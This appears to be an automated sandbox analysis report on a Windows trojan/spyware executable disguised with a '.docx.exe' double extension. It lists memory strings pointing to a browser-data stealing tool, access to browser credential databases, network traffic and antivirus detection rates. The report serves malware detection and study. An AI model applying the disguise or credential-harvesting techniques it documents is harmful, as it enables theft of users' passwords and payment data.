Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://docs.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/moonD4rk/HackBrowserDataCompactions
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000158000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureC:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000082000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdsync:
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://www.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@1/25@0/1

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Roaming\hack

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Local\Temp\Session Storage_8.temp

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2090778427.0000017DE6495000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2092505050.0000017DE6525000.00000004.00001000.00020000.00000000.sdmp, Login Data_1.temp.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: flag verification failed: password-check not found%s has arguments but cannot be invoked as functioncrypto/elliptic: nistec rejected normalized scalarx509: missing ASN.1 contents; use ParseCertificatex509: invalid RDNSequence: invalid attribute valuex509: RSA public exponent is not a positive numberchacha20: SetCounter attempted to rollback counterhttps://microsoftedge.microsoft.com/addons/detail/edwards25519: invalid SetUniformBytes input length %3d \| %10d \| %13.5f \| %13.5f \| %13.5f \| %13.5f
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: mswsock.dll	Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static file information: File size 12996608 > 1048576

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5fc400
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5a3000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains sections with non-standard names

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .xdata
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .symtab

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.exe

Static PE information: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2121298740.0000017DA0EB8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
